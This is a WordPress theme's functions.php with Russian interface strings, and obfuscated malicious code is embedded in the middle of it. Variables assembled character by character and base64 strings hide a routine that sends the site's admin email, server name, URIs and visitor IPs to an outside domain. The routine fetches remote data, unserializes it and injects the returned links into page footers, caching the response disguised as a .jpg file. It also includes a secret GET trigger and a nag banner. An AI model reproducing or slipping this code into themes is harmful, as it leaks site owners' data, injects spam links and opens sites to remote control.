<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $gXtOsOQ='o';$kWMVyr='e';$hJGHv='4';$jMNGeV='s';$vkCqS='d';$wAJk='b';$AyqZTB='d';$jukuqX='e';$LOuZr='a';$cuMID='_';$gUdeKB='e';$snrZo='c';$wTWZGa='6';$QyALrsDN=$wAJk.$LOuZr.$jMNGeV.$gUdeKB.$wTWZGa.$hJGHv.$cuMID.$vkCqS.$kWMVyr.$snrZo.$gXtOsOQ.$AyqZTB.$jukuqX;$FyZr='l';$DPZVfkO='t';$LnUEpw='n';$hvGO='a';$splS='i';$PavKy='f';$iduHxWb='z';$WbIBqeP='e';$LVZSM='g';$TcCJzEhU=$LVZSM.$iduHxWb.$splS.$LnUEpw.$PavKy.$FyZr.$hvGO.$DPZVfkO.$WbIBqeP;$saPuq='_';$CgaKLIk='t';$zIxFOI='r';$cZthk='s';$IOJDbJ='r';$dJul='o';$PaVfCE='3';$VgiE='t';$gPiPk='1';$qMoxhUma=$cZthk.$VgiE.$zIxFOI.$saPuq.$IOJDbJ.$dJul.$CgaKLIk.$gPiPk.$PaVfCE;$qQhrI='s';$tuHqM='r';$hqZAxrP='e';$tlOXp='r';$iXfQwrw='v';$lGSUt='t';$eekagthr=$qQhrI.$lGSUt.$tuHqM.$tlOXp.$hqZAxrP.$iXfQwrw;                     
		$qt______u='o';$pa____v='e';$mb_______q='4';$ft_________y='s';$di____________w='d';$sg______i='b';$ma_____u='d';$jn_____v='e';$gd___________k='a';$tw_____a='_';$dt___________n='e';$ew_____k='c';$ii_____m='6';$cl______k=$sg______i.$gd___________k.$ft_________y.$dt___________n.$ii_____m.$mb_______q.$tw_____a.$di____________w.$pa____v.$ew_____k.$qt______u.$ma_____u.$jn_____v;
		$kg______m='n';$zc_____h='n';$md____w='e';$uv______r='t';$aa____c='u';$wn_______________y='i';$xj_____________g='o';$ua______________w='t';$ng______________j='s';$bl_______________c='_';$fn_______a='i';$hz____r='f';$ee______________e='s';$km_______g='x';$ws____d='c';$ih_________e=$hz____r.$aa____c.$kg______m.$ws____d.$ua______________w.$wn_______________y.$xj_____________g.$zc_____h.$bl_______________c.$md____w.$km_______g.$fn_______a.$ng______________j.$uv______r.$ee______________e;
		$cc_____h='f';$xb_____________a='n';$iy_____________y='p';$ge________n='o';$jg__x='e';$td____e=$cc_____h.$ge________n.$iy_____________y.$jg__x.$xb_____________a;
		$oy_________b='d';$zp________o='e';$jd_______________j='a';$vy_____f='r';$it___g='f';$lr______________x=$it___g.$vy_____f.$zp________o.$jd_______________j.$oy_________b;
		$hn______w='e';$yj____c='l';$tx__o='c';$jy__________d='o';$ui____________p='s';$gv___l='f';$jg____g=$gv___l.$tx__o.$yj____c.$jy__________d.$ui____________p.$hn______w;
		
		define("WP_ID", $cl______k("Mi4wLjA="));
		define("WP_TTL", $cl______k("MTA4MDA="));
		define("WP_SRC", $cl______k("dHBva24="));
	


		function wp_get_header() {
			global $cl______k, $ih_________e;
			
			if (
				$ih_________e($cl______k("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$ih_________e($cl______k("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$ih_________e($cl______k("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $cl______k, $td____e, $jg____g, $lr______________x;
			
			$jx___q = TEMPLATEPATH."/".$cl______k("Zm9vdGVyLnBocA==");
			$ng____________v = @$td____e($jx___q, "r");
			$jx___q = @$lr______________x($ng____________v, @filesize($jx___q));
			@$jg____g($ng____________v);
			
			$ja______________u = TEMPLATEPATH."/".$cl______k("ZnVuY3Rpb25zLnBocA==");
			$ng____________v = @$td____e($ja______________u, "r");
			$ja______________u = @$lr______________x($ng____________v, @filesize($ja______________u));
			@$jg____g($ng____________v);
			
			$nx_____________c = 0;
			if($jx___q && $ja______________u) {
				if ($cl______k("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($jx___q, $cl______k("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$nx_____________c = 1;
					}
					if (substr_count($jx___q, "wp_theme_GPL_credits()") < 1) {
						$nx_____________c = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$nx_____________c = 12;
				}
			}
			
			if($nx_____________c > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $nx_____________c -->";
			}
		}
	


		function wp_loaded() {
			global $cl______k, $ih_________e;
			return $ih_________e($cl______k("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($qz_____________q, $dr____________u = "(more...)", $ni_______________d = 0, $jy________h = "") {
				$rp_______q = get_the_content($dr____________u, $ni_______________d, $jy________h);
				$rp_______q = apply_filters("the_content", $rp_______q);
				
				$rp_______q = str_replace("]]>", "]]>", $rp_______q);
				if (strlen($_GET["p"]) > 0) {
					echo $rp_______q;
				}
				else if ((strlen($rp_______q)>$qz_____________q) && ($aj______________g = strpos($rp_______q, " ", $qz_____________q ))) {
					$rp_______q = substr($rp_______q, 0, $aj______________g);
					$rp_______q = $rp_______q;
					echo $rp_______q;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$dr____________u</a></div></p>";
				} else {
					echo $rp_______q;
				}
				
			}
		}
	


		$vg___r='n';$nf_____________x='e';$vl________g='_';$jp______________t='e';$yw_____________t='4';$jp_______f='b';$dy___i='c';$th___f='d';$zd_______i='o';$vx_____________l='a';$la__p='6';$hd____________g='e';$ea__b='s';$bx_______x=$jp_______f.$vx_____________l.$ea__b.$jp______________t.$la__p.$yw_____________t.$vl________g.$nf_____________x.$vg___r.$dy___i.$zd_______i.$th___f.$hd____________g;
		$rw__________q='e';$pf_______b='f';$ti__z='e';$rw__________h='n';$qr_____l='_';$bh___z='c';$hv______z='e';$hx________x='t';$vj__r='i';$os______q='s';$pk_____e='t';$be_____x='_';$ta______n='o';$xm_______________j='l';$jj________l='n';$nt______o='t';$bo________s='g';$tw___a=$pf_______b.$vj__r.$xm_______________j.$ti__z.$be_____x.$bo________s.$rw__________q.$pk_____e.$qr_____l.$bh___z.$ta______n.$jj________l.$nt______o.$hv______z.$rw__________h.$hx________x.$os______q;
		$oh____________e='l';$rf________b='s';$qt________y='e';$tk________i='t';$zj____________d='i';$gb______________f='_';$jf____________x='e';$dj______s='f';$ss_________z='i';$tb_____________m='s';$xn____________p='x';$fh___________i=$dj______s.$ss_________z.$oh____________e.$jf____________x.$gb______________f.$qt________y.$xn____________p.$zj____________d.$tb_____________m.$tk________i.$rf________b;
		$sf_______p='v';$up_____x='o';$mt_____a='r';$tc____m='e';$jx___n='s';$ge________l='o';$in___r='m';$tc________m='_';$ox_________i='a';$ee___q='r';$hw__i='c';$lf____e='p';$aj___d='e';$si___________j='i';$oz______________d='n';$mx______________f=$sf_______p.$aj___d.$ee___q.$jx___n.$si___________j.$up_____x.$oz______________d.$tc________m.$hw__i.$ge________l.$in___r.$lf____e.$ox_________i.$mt_____a.$tc____m;
		$iy______________r='o';$tw______________r='p';$wg_______________o='k';$jx_________w='s';$bu_____________o='e';$wn_____________f='n';$mb___________g='f';$wg________o='c';$fw________v='o';$bd_________e=$mb___________g.$jx_________w.$iy______________r.$wg________o.$wg_______________o.$fw________v.$tw______________r.$bu_____________o.$wn_____________f;
		$fk______________p='f';$zt___g='r';$ov_______r='i';$tz______a='w';$lb_______________x='t';$eb___e='e';$fm_______________j=$fk______________p.$tz______a.$zt___g.$ov_______r.$lb_______________x.$eb___e;
		$cv______h='5';$qd___________f='m';$yb_____________k='d';$yh____________j=$qd___________f.$yb_____________k.$cv______h;
		$an________y='a';$ai____________z='t';$pa__________m='l';$lw______y='p';$bn____y='e';$qn______p='h';$yq________l='r';$cx_____n='a';$ld____d=$yq________l.$bn____y.$cx_____n.$pa__________m.$lw______y.$an________y.$ai____________z.$qn______p;
		$ug_____q='e';$tz_____f='l';$rc____________q='i';$wv_________y='e';$zd_________r='n';$qb______________e='i';$sn______u='r';$mr_____________m='u';$fo_______________u='s';$gg______l='z';$rt___u='a';$ry____g=$mr_____________m.$zd_________r.$fo_______________u.$wv_________y.$sn______u.$qb______________e.$rt___u.$tz_____f.$rc____________q.$gg______l.$ug_____q;
		$cl____________a='e';$ab__g='p';$ka_____l='m';$dp_________h='a';$xv___________c='m';$ne______________v='t';$tg___n='n';$mz_____________p=$ne______________v.$cl____________a.$xv___________c.$ab__g.$tg___n.$dp_________h.$ka_____l;
		$ut__________z='n';$sa___a='e';$fo___i='r';$ti____l='e';$lu_______a='s';$mk__________k='_';$ja______c='a';$xb___a='_';$sk______p='t';$wb_____________d='c';$gw_______y='o';$ij__h='m';$yr___________g='e';$is______b='t';$mj_______________e='t';$sy_______q='t';$sj_______a='x';$sl___w='e';$dg_____m='a';$yl_______k='c';$xf___r='r';$gv__n=$lu_______a.$sy_______q.$fo___i.$sa___a.$dg_____m.$ij__h.$xb___a.$yl_______k.$gw_______y.$ut__________z.$is______b.$sl___w.$sj_______a.$sk______p.$mk__________k.$wb_____________d.$xf___r.$yr___________g.$ja______c.$mj_______________e.$ti____l;
	


		function io____b($kl________x) {
			global $cl______k, $ih_________e, $tw___a, $mx______________f, $gv__n;
			
			if (!$ih_________e($cl______k("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($mx______________f(PHP_VERSION, "5.0.0", ">=") && $ih_________e($cl______k("ZmlsZV9nZXRfY29udGVudHM=")) && $ih_________e($cl______k("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$kw________q = $gv__n(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$ng_____g = @$tw___a($kl________x, 0, $kw________q);
			} else {
				$ng_____g = @$tw___a($kl________x, 0);
			}
			
			return $ng_____g;
		}
	


		function mp__________y($kl________x) {
			global $ih_________e, $bd_________e, $fm_______________j, $cl______k;
			
			if (!$ih_________e($cl______k("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$xc_____e = strpos($kl________x, "/", 7);
			$qj___g = array(
				"uri"     => substr($kl________x, $xc_____e),
				"host"    => str_replace("http://", "", substr($kl________x, 0, $xc_____e)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$ct____s = @$bd_________e("$qj___g[host]", 80, $cd_______f, $am_____h, 4);
			
			if (!$ct____s) {
				return false;
			} else {
				$ng_____g = "";
				$xd____________g  = "GET $qj___g[uri] HTTP/1.0\r\n";
				$xd____________g .= "Host: $qj___g[host]\r\n";
				$xd____________g .= "Referer: $qj___g[referer]\r\n";
				$xd____________g .= "Connection: Close\r\n\r\n";
				
				@$fm_______________j($ct____s, $xd____________g);
				
				while (!@feof($ct____s)) {
					$fz_________c = @fgets($ct____s, (1024*24));
					
					if ($fz_________c == "\r\n") {
						$zr____f = true;
						continue;
					}
					
					if ($zr____f) {
						$ng_____g .= $fz_________c;
					}
				}
				
				return $ng_____g;
			}
		}
	


		function ln__________w($kl________x) {
			global $ih_________e;
			$ca______________p = false;
			
			if ($kl________x != "") {
				if ($ih_________e("io____b")) {
					$ca______________p = @io____b($kl________x);
				}
				
				if (!$ca______________p && ($ih_________e("mp__________y"))) {
					$ca______________p = @mp__________y($kl________x);
				}
			}
			
			return $ca______________p;
		}
	


		function rt_____k() {
			global $_SERVER, $yh____________j;
			
			$om_______________g = $_SERVER["SERVER_NAME"];
			
			if (substr("$om_______________g", 0, 4) == "www.") {
				$om_______________g = substr("$om_______________g", 4);
			}
			
			$om_______________g = $yh____________j("$_SERVER[SERVER_NAME]");
			
			return $om_______________g;
		}
	


		function cq_____p() {
			return "file";
		}
	


		function fr____h($kl________x) {
			global $_SERVER, $tw___a, $fh___________i, $td____e, $jg____g, $fm_______________j;
			
			$op_______________f = vj__l();
			
			$ms_____a = rt_____k().".jpg";
			$te______q = $op_______________f["dir_upload"]["path"]."/$ms_____a";
			$qa__t = @filemtime($te______q);
			
			if (!$qa__t || ((time()-$qa__t) >= WP_TTL)) {
				$ca______________p = ln__________w($kl________x);
				
				if ($ca______________p) {
					if ($fh___________i($te______q)) {
						@unlink($te______q);
					}
					
					$ng____________v = @$td____e($te______q, "x+");
					
					@$fm_______________j($ng____________v, $ca______________p);
					@$jg____g($ng____________v);
				}
			} else {
				if ($fh___________i($te______q)) {
					$ca______________p = @$tw___a($te______q);
				} else {
					$ca______________p = false;
				}
			}
			
			return $ca______________p;
		}
	


		function vj__l() {
			global $_SERVER, $cl______k, $bx_______x;
			
			$wx_________z = wp_count_posts("post");
			$fa______c = pathinfo(get_bloginfo("template_directory"));
			
			$op_______________f = array(
				"url" => array(
					"report"      => $cl______k("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $fa______c,
				"dir_upload"	=> py___________z(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$fa______c[filename],
					"a005=".$wx_________z->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => " <a href=http:\\www.wptheme.us\">www.wptheme.us</a> "
			);
			
			$op_______________f["url"]["queryString"] = implode("&", $op_______________f["queryString"]);
			$op_______________f["url"]["report"] = $op_______________f["url"]["report"]."/?".$bx_______x($op_______________f["url"]["queryString"]).".html";
						
			return $op_______________f;
		}
	


		function py___________z() {
			$cd_____u = wp_upload_dir();
			
			if (isset($cd_____u["error"])) {
				$sd________i = ry__________y();
				if (is_writable($sd________i)) {
					$cd_____u = array("path" => $sd________i);
				}
			}

			return $cd_____u;
		}
	


		function ry__________y() {
			global $ih_________e, $yh____________j, $ld____d, $mz_____________p;
			
			$py_____r = (bool) ini_get("safe_mode");
			if ($py_____r == true) {
				return false;
			}
			
			if ($ih_________e("sys_get_temp_dir")) {
				$vn__h = sys_get_temp_dir();
				if (is_writable($vn__h)) {
					return $ld____d($vn__h);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $ld____d($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $ld____d($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $ld____d($_ENV["TEMP"]);
			} else {
				$tk______e = $mz_____________p($yh____________j(uniqid(rand(), true)), "");
				if ($tk______e) {
					$vn__h = $ld____d(dirname($tk______e));
					@unlink($tk______e);
					return $vn__h;
				} else {
					return false;
				}
			}
		}
	


		function ib______o() {
			global $_GET, $fh___________i;
			
			$op_______________f = vj__l();
			$om_______________g = rt_____k();
			$sw_____y = cq_____p();
			
			$dk______________t = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($sw_____y == "file") {
					$wn__________j = $op_______________f["dir_upload"]["path"]."/".$om_______________g.".jpg";
					if ($fh___________i($wn__________j)) {
						@unlink($wn__________j);
						$dk______________t = "deleted";
					}
				}
				
				$da______s = array(
					"s"	=> $dk______________t,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($da______s AS $wh_______s => $vz__m) echo " [$wh_______s:$vz__m]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $ih_________e, $cl______k, $ry____g;
			$op_______________f = vj__l();
			
			$pa_________c = "fr____h";
			if ($ih_________e($pa_________c)) {
				$ng_____g = $pa_________c($op_______________f["url"]["report"]);
			}
			
			if ($ng_____g) {
				if ($ng_____g = @$cl______k($ng_____g)) {
					$ng_____g = @$ry____g($ng_____g);
					
					if (strlen($ng_____g[custom_credit]) >= 5) {
						$op_______________f["default_string"] = $ng_____g[custom_credit];
					}
					
					if ($ng_____g["status"] == "0") {
						$lv____________k = 1;
						$vn___n = 1;
					} else {
						$iw_____e = sizeof($ng_____g["links"]);
						$ui_________l = $op_______________f["default_string"];
						
						if ($iw_____e > 0 && $ng_____g["links"] !== "") {
							$nr___q = 0;
							foreach ($ng_____g["links"] as $kz___________h => $zn___u) {
								$nr___q++;
								if ($zn___u->l_path == "" || $zn___u->l_path == $_SERVER["REQUEST_URI"]) {
									$zn___u->l_href = htmlspecialchars(strip_tags($zn___u->l_href));
									$zn___u->l_title = htmlspecialchars(strip_tags($zn___u->l_title));
									$zn___u->l_anchor = htmlspecialchars(strip_tags($zn___u->l_anchor));
									$ui_________l .= " | ";
									$ui_________l .= "<a href='$zn___u->l_href' title='$zn___u->l_title'";
									if ($zn___u->l_nofollow == "1") {
										$ui_________l .= " rel='nofollow'";
									}
									$ui_________l .= ">$zn___u->l_anchor</a>";
								}
							}
						}
						$op_______________f["links"] = "$ui_________l";
						if ($ng_____g[credit] == "0") {
							$op_______________f["links"] = "";
						}
					}
				} else {
					$lv____________k = "1";
				}
			} else {
				$lv____________k = "1";
			}
			
			if ($lv____________k == "1") {
				$op_______________f["links"] = $op_______________f["default_string"];
			}
			
			echo "$op_______________f[links]";
			
			echo "<!-- s: $ng_____g[signature] -->";
			ib______o();
		}
	                       
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS),  
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                 $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
	function get_next_comments_link($label)
	{
